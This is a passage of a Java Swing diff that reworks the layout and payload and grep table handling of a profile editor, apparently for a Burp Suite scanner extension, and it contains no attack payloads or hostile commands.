jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jSeparator5) - .addComponent(jSeparator6, javax.swing.GroupLayout.Alignment.TRAILING) - .addGroup(jPanel11Layout.createSequentialGroup() - .addComponent(jSeparator12) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(jSeparator11, javax.swing.GroupLayout.PREFERRED_SIZE, 846, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addGroup(jPanel11Layout.createSequentialGroup() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel11Layout.createSequentialGroup() - .addContainerGap() - .addComponent(radio12) - .addGap(151, 151, 151) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(radio22) - .addComponent(invariationsRadio))) - .addGroup(jPanel11Layout.createSequentialGroup() - .addContainerGap() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(radio4) - .addComponent(radio3)) - .addGap(116, 116, 116) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(radiotime) - .addComponent(radiocl)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(texttime, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(textcl, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel16, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel42, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE))) - .addGroup(jPanel11Layout.createSequentialGroup() - .addGap(20, 20, 20) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel6) - .addComponent(jLabel2)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(rb1) - .addComponent(rb2) - .addComponent(rb3) - .addComponent(rb4) - .addComponent(sp1, javax.swing.GroupLayout.PREFERRED_SIZE, 56, javax.swing.GroupLayout.PREFERRED_SIZE))) - .addGroup(jPanel11Layout.createSequentialGroup() - .addContainerGap() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel31) - .addComponent(jLabel30, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(onlyhttp) - .addComponent(check4) + negativeURL.setText("Negative match"); + + check73.setText("URL Extension"); + + buttonGroup3.add(radiocl); + radiocl.setText("Content Length difference"); + radiocl.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radioclSelect(evt); + } + }); + radiocl.addActionListener(new java.awt.event.ActionListener() { + public void actionPerformed(java.awt.event.ActionEvent evt) { + radioclActionPerformed(evt); + } + }); + + buttonGroup3.add(radio12); + radio12.setText("Payload"); + radio12.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radio12payloadMatchType(evt); + } + }); + + buttonGroup3.add(radio22); + radio22.setText("Payload without encode"); + radio22.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radio22payloadencodeMatchType(evt); + } + }); + + jLabel42.setText("Bytes"); + + buttonGroup3.add(invariationsRadio); + invariationsRadio.setText("Invariations"); + invariationsRadio.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + invariationsRadioinvariations(evt); + } + }); + + buttonGroup3.add(radiotime); + radiotime.setText("Timeout between"); + radiotime.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radiotimeTimeoutSelect(evt); + } + }); + + buttonGroup3.add(radiohttp); + radiohttp.setText("HTTP response codes"); + + buttonGroup3.add(radio3); + radio3.setText("Regex"); + radio3.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radio3regexMatchType(evt); + } + }); + + jLabel21.setText("and"); + + buttonGroup3.add(radio4); + radio4.setText("Simple string"); + radio4.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + radio4stringMatchType(evt); + } + }); + + jLabel16.setText("Seconds"); + + buttonGroup3.add(variationsRadio); + variationsRadio.setText("Variations"); + variationsRadio.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + variationsRadiovariations(evt); + } + }); + + javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1); + jPanel1.setLayout(jPanel1Layout); + jPanel1Layout.setHorizontalGroup( + jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel1Layout.createSequentialGroup() + .addContainerGap() + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addGroup(jPanel1Layout.createSequentialGroup() + .addComponent(radio4) + .addGap(58, 58, 58)) + .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup() + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addComponent(radio12, javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(radio3, javax.swing.GroupLayout.Alignment.LEADING)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED))) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(variationsRadio) + .addComponent(invariationsRadio) + .addComponent(radio22)) + .addGap(36, 36, 36) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel1Layout.createSequentialGroup() + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(radiotime) + .addComponent(radiohttp)) + .addGap(30, 30, 30) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) + .addGroup(jPanel1Layout.createSequentialGroup() + .addComponent(texttime1, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(jLabel21) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(texttime2, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(resposecode, javax.swing.GroupLayout.PREFERRED_SIZE, 226, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(jLabel16, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGroup(jPanel1Layout.createSequentialGroup() + .addComponent(radiocl) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addComponent(textcl, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addComponent(jLabel42, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE))) + .addContainerGap()) + ); + jPanel1Layout.setVerticalGroup( + jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel1Layout.createSequentialGroup() + .addGap(17, 17, 17) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel1Layout.createSequentialGroup() + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(radiocl) + .addComponent(textcl, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel42) + .addComponent(radio22)) + .addGap(18, 18, 18) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(radiohttp) + .addComponent(resposecode, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGap(18, 18, 18) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(texttime2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(texttime1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel21) + .addComponent(jLabel16) + .addComponent(radiotime))) + .addGroup(jPanel1Layout.createSequentialGroup() + .addComponent(radio4) + .addGap(18, 18, 18) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(radio3) + .addComponent(variationsRadio)) + .addGap(18, 18, 18) + .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(radio12) + .addComponent(invariationsRadio)))) + .addContainerGap()) + ); + + javax.swing.GroupLayout jPanel11Layout = new javax.swing.GroupLayout(jPanel11); + jPanel11.setLayout(jPanel11Layout); + jPanel11Layout.setHorizontalGroup( + jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jSeparator5) + .addComponent(jSeparator6, javax.swing.GroupLayout.Alignment.TRAILING) + .addComponent(jSeparator11, javax.swing.GroupLayout.Alignment.TRAILING) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGap(20, 20, 20) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jLabel6) + .addComponent(jLabel2)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(rb1) + .addComponent(rb2) + .addComponent(rb3) + .addComponent(rb4) + .addComponent(sp1, javax.swing.GroupLayout.PREFERRED_SIZE, 56, javax.swing.GroupLayout.PREFERRED_SIZE))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addContainerGap() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jLabel31) + .addComponent(jLabel30, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(onlyhttp) + .addComponent(check4) .addComponent(check1) .addComponent(excludehttp) + .addComponent(jLabel29) + .addComponent(jLabel28, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel11Layout.createSequentialGroup() .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(check72) .addComponent(check71)) .addGap(15, 15, 15) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) - .addComponent(text71, javax.swing.GroupLayout.DEFAULT_SIZE, 441, Short.MAX_VALUE) - .addComponent(text72)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(negativeCT) - .addComponent(negativeRC))) - .addComponent(jLabel29) - .addComponent(jLabel28, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE))) - .addGroup(jPanel11Layout.createSequentialGroup() - .addContainerGap() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel25) - .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel27) - .addComponent(jLabel26, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(Attributes, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(variationsRadio))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, 441, javax.swing.GroupLayout.PREFERRED_SIZE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(negativeURL)) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) + .addComponent(text71, javax.swing.GroupLayout.DEFAULT_SIZE, 441, Short.MAX_VALUE) + .addComponent(text72)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(negativeCT) + .addComponent(negativeRC))))))) .addGroup(jPanel11Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) @@ -1558,8 +1732,22 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(button7, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(button21, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(18, 18, 18) - .addComponent(jScrollPane15, javax.swing.GroupLayout.PREFERRED_SIZE, 662, javax.swing.GroupLayout.PREFERRED_SIZE))))) - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) + .addComponent(jScrollPane15, javax.swing.GroupLayout.PREFERRED_SIZE, 662, javax.swing.GroupLayout.PREFERRED_SIZE)))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addContainerGap() + .addComponent(check73)) + .addGroup(jPanel11Layout.createSequentialGroup() + .addContainerGap() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jLabel25) + .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel26, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(Attributes, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel27))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addContainerGap() + .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))) + .addContainerGap(50, Short.MAX_VALUE)) ); jPanel11Layout.setVerticalGroup( jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) @@ -1568,36 +1756,12 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jLabel27) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel26) - .addGap(25, 25, 25) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel11Layout.createSequentialGroup() - .addComponent(radio4) - .addGap(18, 18, 18) - .addComponent(radio3) - .addGap(18, 18, 18) - .addComponent(radio12)) - .addGroup(jPanel11Layout.createSequentialGroup() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) - .addComponent(radiotime) - .addComponent(texttime, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel16)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) - .addComponent(radiocl) - .addComponent(jLabel42) - .addComponent(textcl, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addComponent(radio22))) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) - .addComponent(variationsRadio) - .addComponent(invariationsRadio)) + .addGap(18, 18, 18) + .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(18, 18, 18) .addComponent(Attributes, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(18, 18, 18) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) - .addComponent(jSeparator12) - .addComponent(jSeparator11)) + .addComponent(jSeparator11, javax.swing.GroupLayout.PREFERRED_SIZE, 3, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel25) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -1607,16 +1771,16 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(button8)) .addGap(18, 18, Short.MAX_VALUE) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jScrollPane15, javax.swing.GroupLayout.PREFERRED_SIZE, 206, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel11Layout.createSequentialGroup() .addComponent(button21) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button7) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(button10) + .addComponent(button20) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(button20)) - .addComponent(jScrollPane15, javax.swing.GroupLayout.PREFERRED_SIZE, 128, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(button10))) .addGap(18, 18, 18) .addComponent(jSeparator6, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -1641,6 +1805,11 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(check72) .addComponent(text72, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(negativeRC)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(check73) + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(negativeURL)) .addGap(18, 18, 18) .addComponent(jSeparator5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -1991,14 +2160,14 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addContainerGap() .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(text1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel12) .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel18)) - .addGap(18, 18, 18) - .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addComponent(headerstab, javax.swing.GroupLayout.DEFAULT_SIZE, 606, Short.MAX_VALUE)) ); }// //GEN-END:initComponents @@ -2010,10 +2179,7 @@ private void jButton9removeEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST: }//GEN-LAST:event_jButton9removeEncoder private void button6setToPayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button6setToPayload - if (!textfield1.getText().isEmpty()) { - payload.addElement(textfield1.getText()); - textfield1.setText(""); - } + modelpayload.addRow(new Object[]{true, "Value"}); }//GEN-LAST:event_button6setToPayload private void jButton8upEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton8upEncoder @@ -2031,26 +2197,26 @@ private void button3loadPayloads(java.awt.event.ActionEvent evt) {//GEN-FIRST:ev }//GEN-LAST:event_button3loadPayloads private void button2pastePayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button2pastePayload - String element = getClipboardContents(); - String[] lines = element.split("\n"); - for (String line : lines) { - payload.addElement(line); - } + List lines = Arrays.asList(element.split("\n")); + showPayloads(lines); }//GEN-LAST:event_button2pastePayload private void jLabel17goWeb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel17goWeb try { Desktop.getDesktop().browse(new URI("https://portswigger.net/burp/extender/api/burp/IScannerInsertionPoint.html")); } catch (URISyntaxException | IOException e) { - callbacks.printError("Active profile line 2109 Help web not opened: " + e); + System.out.println("Active profile line 2109 Help web not opened: " + e); } }//GEN-LAST:event_jLabel17goWeb private void button4removePayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button4removePayload - int selectedIndex = list1.getSelectedIndex(); - if (selectedIndex != -1) { - payload.remove(selectedIndex); + int[] rows = table6.getSelectedRows(); + Arrays.sort(rows); + for (int i = rows.length - 1; i >= 0; i--) { + int row = rows[i]; + int modelRow = table6.convertRowIndexToModel(row); + modelpayload.removeRow(modelRow); } }//GEN-LAST:event_button4removePayload @@ -2078,7 +2244,10 @@ private void jButton6addEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:eve }//GEN-LAST:event_jButton6addEncoder private void button5removeAllPayloads(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button5removeAllPayloads - payload.removeAllElements(); + int rowCount = modelpayload.getRowCount(); + for (int i = rowCount - 1; i >= 0; i--) { + modelpayload.removeRow(i); + } }//GEN-LAST:event_button5removeAllPayloads private void AllItemStateChanged(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_AllItemStateChanged @@ -2121,6 +2290,10 @@ private void AllItemStateChanged(java.awt.event.ItemEvent evt) {//GEN-FIRST:even } }//GEN-LAST:event_AllItemStateChanged + private void paramxmlActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_paramxmlActionPerformed + // TODO add your handling code here: + }//GEN-LAST:event_paramxmlActionPerformed + private void jButton7downEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton7downEncoder int selectedIndex = list3.getSelectedIndex(); if (selectedIndex != encoder.getSize() - 1) { @@ -2131,66 +2304,6 @@ private void jButton7downEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:ev } }//GEN-LAST:event_jButton7downEncoder - private void radio12payloadMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio12payloadMatchType - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } - }//GEN-LAST:event_radio12payloadMatchType - - private void radio4stringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio4stringMatchType - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } - }//GEN-LAST:event_radio4stringMatchType - - private void radio3regexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio3regexMatchType - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } - }//GEN-LAST:event_radio3regexMatchType - - private void radio22payloadencodeMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio22payloadencodeMatchType - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } - }//GEN-LAST:event_radio22payloadencodeMatchType - - private void radiotimeTimeoutSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radiotimeTimeoutSelect - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { - setEnabledVariations(true); - } - }//GEN-LAST:event_radiotimeTimeoutSelect - - private void radioclSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radioclSelect - if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(false); - } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { - setEnabledVariations(true); - } - }//GEN-LAST:event_radioclSelect - - private void radioclActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_radioclActionPerformed - // TODO add your handling code here: - }//GEN-LAST:event_radioclActionPerformed - - private void variationsRadiovariations(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_variationsRadiovariations - if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { - setEnabledVariations(false); - } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(true); - } - }//GEN-LAST:event_variationsRadiovariations - - private void invariationsRadioinvariations(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_invariationsRadioinvariations - if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { - setEnabledVariations(false); - } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { - setEnabledVariations(true); - } - }//GEN-LAST:event_invariationsRadioinvariations - private void removetag(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removetag int selectedIndex = listtag.getSelectedIndex(); if (selectedIndex != -1) { @@ -2228,6 +2341,31 @@ private void headerstabStateChanged(javax.swing.event.ChangeEvent evt) {//GEN-FI } }//GEN-LAST:event_headerstabStateChanged + private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button8loadGrep + loadGrepsFile(modelgrep); + }//GEN-LAST:event_button8loadGrep + + private void button21addGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button21addGrep + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", "Value"}); + } else { + modelgrep.addRow(new Object[]{true, "Or", "Value"}); + } + }//GEN-LAST:event_button21addGrep + + private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button7pasteGrep + String element = getClipboardContents(); + List lines = Arrays.asList(element.split("\n")); + showGreps(lines); + }//GEN-LAST:event_button7pasteGrep + + private void button10removeAllGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button10removeAllGrep + int rowCount = modelgrep.getRowCount(); + for (int i = rowCount - 1; i >= 0; i--) { + modelgrep.removeRow(i); + } + }//GEN-LAST:event_button10removeAllGrep + private void button20removeMatchReplace(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button20removeMatchReplace int[] rows = table5.getSelectedRows(); Arrays.sort(rows); @@ -2238,26 +2376,65 @@ private void button20removeMatchReplace(java.awt.event.ActionEvent evt) {//GEN-F } }//GEN-LAST:event_button20removeMatchReplace - private void button10removeAllGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button10removeAllGrep - int rowCount = modelgrep.getRowCount(); - for (int i = rowCount - 1; i >= 0; i--) { - modelgrep.removeRow(i); + private void invariationsRadioinvariations(java.awt.event.ItemEvent evt) 